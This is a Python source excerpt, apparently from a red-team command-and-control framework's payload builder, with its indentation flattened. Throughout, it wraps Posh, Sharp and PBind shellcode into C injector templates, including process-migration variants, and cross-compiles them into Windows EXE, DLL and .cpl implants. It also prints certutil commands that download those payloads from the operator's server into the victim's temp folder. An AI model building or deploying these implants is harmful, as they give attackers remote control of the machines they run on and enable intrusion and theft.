def CreateEXEFiles(self, sourcefile, payloadtype, name=""):
# Get the first URL and the default migration process from the config
migrate_process = DefaultMigrationProcess
if "\\" in migrate_process and "\\\\" not in migrate_process:
migrate_process = migrate_process.replace("\\", "\\\\")
if payloadtype == PayloadType.Posh_v2:
# Get the Posh shellcode
with open("%s%sPosh_v2_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode32 = formStr("char sc[]", hexcode)
with open("%s%sPosh_v2_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode64 = formStr("char sc[]", hexcode)
elif payloadtype == PayloadType.Posh_v4:
# Get the Posh shellcode
with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode32 = formStr("char sc[]", hexcode)
with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode64 = formStr("char sc[]", hexcode)
elif payloadtype == PayloadType.Sharp:
# Get the Sharp shellcode
with open("%s%sSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode32 = formStr("char sc[]", hexcode)
with open("%s%sSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode64 = formStr("char sc[]", hexcode)
elif payloadtype == PayloadType.PBind:
# Get the Posh shellcode
with open("%s%sPBind_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode32 = formStr("char sc[]", hexcode)
with open("%s%sPBind_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode64 = formStr("char sc[]", hexcode)
elif payloadtype == PayloadType.PBindSharp:
# Get the Sharp shellcode
with open("%s%sPBindSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode32 = formStr("char sc[]", hexcode)
with open("%s%sPBindSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
shellcodesrc = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
shellcode64 = formStr("char sc[]", hexcode)
# Create the raw C file from the template
with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f:
content = f.read()
content = str(content) \
.replace("#REPLACEME#", str(shellcode64)) \
.replace("#REPLACEMEPROCESS#", migrate_process)
with open("%s%s%s_%s_x64.c" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), 'w') as f:
f.write(content)
# Create the raw C file from the template
with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f:
content = f.read()
content = str(content) \
.replace("#REPLACEME#", str(shellcode32)) \
.replace("#REPLACEMEPROCESS#", migrate_process)
with open("%s%s%s_%s_x86.c" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), 'w') as f:
f.write(content)
# Compile the exe or dll depinding if there is a dllmain and process_attach
if sourcefile.lower().endswith(".dll.c"):
sourcefile = sourcefile.replace(".c", "")
subprocess.check_output("x86_64-w64-mingw32-gcc -w -shared %s%s%s_%s_x64.c -o %s%s%s_%s_x64.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile, self.BaseDirectory, name, payloadtype.value, sourcefile), shell=True)
subprocess.check_output("i686-w64-mingw32-gcc -w -shared %s%s%s_%s_x86.c -o %s%s%s_%s_x86.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile, self.BaseDirectory, name, payloadtype.value, sourcefile), shell=True)
self.QuickstartLog("Payload written to: %s%s%s_%s_x64.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile))
self.QuickstartLog("Payload written to: %s%s%s_%s_x86.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile))
if "CPlApplet" in content:
shutil.copy(f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x64.dll", f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x64.dll.cpl")
shutil.copy(f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x86.dll", f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x86.dll.cpl")
self.QuickstartLog("Payload written to: %s%s%s_%s_x64.dll.cpl" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
self.QuickstartLog("Payload written to: %s%s%s_%s_x86.dll.cpl" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
else:
subprocess.check_output("x86_64-w64-mingw32-gcc -w %s%s%s_%s_x64.c -o %s%s%s_%s_x64.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", ""), self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), shell=True)
subprocess.check_output("i686-w64-mingw32-gcc -w %s%s%s_%s_x86.c -o %s%s%s_%s_x86.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", ""), self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), shell=True)
self.QuickstartLog("Payload written to: %s%s%s_%s_x64.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
self.QuickstartLog("Payload written to: %s%s%s_%s_x86.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
def CreateEXE(self, name=""):
with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name),
'rb') as f:
sc64 = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in sc64)
sc64 = formStr("char sc[]", hexcode)
with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory,
'r') as f:
content = f.read()
ccode = str(content).replace("#REPLACEME#", str(sc64))
self.QuickstartLog("64bit EXE Payload written to: %s%sPosh64.exe" %
(self.BaseDirectory, name))
filename = "%s%sPosh64.c" % (self.BaseDirectory, name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory,
'r') as f:
content = f.read()
ccode = str(content).replace("#REPLACEME#", str(sc64))
migrate_process = DefaultMigrationProcess
if "\\" in migrate_process and "\\\\" not in migrate_process:
migrate_process = migrate_process.replace("\\", "\\\\")
ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
self.QuickstartLog(
"64bit EXE Payload written to: %s%sPosh64_migrate.exe" %
(self.BaseDirectory, name))
filename = "%s%sPosh64_migrate.c" % (self.BaseDirectory, name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name),
'rb') as f:
sc32 = f.read()
hexcode = "".join("\\x{:02x}".format(c) for c in sc32)
sc32 = formStr("char sc[]", hexcode)
with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory,
'r') as f:
content = f.read()
ccode = str(content).replace("#REPLACEME#", str(sc32))
self.QuickstartLog("32bit EXE Payload written to: %s%sPosh32.exe" %
(self.BaseDirectory, name))
filename = "%s%sPosh32.c" % (self.BaseDirectory, name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory,
'r') as f:
content = f.read()
ccode = str(content).replace("#REPLACEME#", str(sc32))
ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
self.QuickstartLog(
"32bit EXE Payload written to: %s%sPosh32_migrate.exe" %
(self.BaseDirectory, name))
filename = "%s%sPosh32_migrate.c" % (self.BaseDirectory, name)
output_file = open(filename, 'w')
output_file.write(ccode)
output_file.close()
try:
uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex64"
filename = randomuri()
self.QuickstartLog(Colours.END)
self.QuickstartLog(
"Download Posh64 & Posh32 executables using certutil:" +
Colours.GREEN)
self.QuickstartLog(
"certutil -urlcache -split -f %s %%temp%%\\%s.exe" %
(uri, filename))
if os.name == 'nt':
compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64.c -o %s%sPosh64.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32.c -o %s%sPosh32.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
else:
compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64.c -o %s%sPosh64.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32.c -o %s%sPosh32.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
subprocess.check_output(compile64, shell=True)
subprocess.check_output(compile32, shell=True)
uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex86"
filename = randomuri()
self.QuickstartLog(
"certutil -urlcache -split -f %s %%temp%%\\%s.exe" %
(uri, filename))
if os.name == 'nt':
compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
else:
compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
self.BaseDirectory, name, self.BaseDirectory, name)
subprocess.check_output(compile64, shell=True)
subprocess.check_output(compile32, shell=True)
self.QuickstartLog(Colours.END)
self.QuickstartLog(
"Download Posh/Sharp x86 and x64 shellcode from the webserver:"
+ Colours.GREEN)
uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/64/portal"
self.QuickstartLog(
"certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
(uri, filename))
uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/86/portal"
self.QuickstartLog(
"certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
(uri, filename))
uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/64/portal"
self.QuickstartLog(
"certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
(uri, filename))
uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/86/portal"
self.QuickstartLog(
"certutil -urlcache -split -f %s %%temp%%\\%s.bin" %
(uri, filename))
except Exception as e:
print(e)
print(
"apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common"
)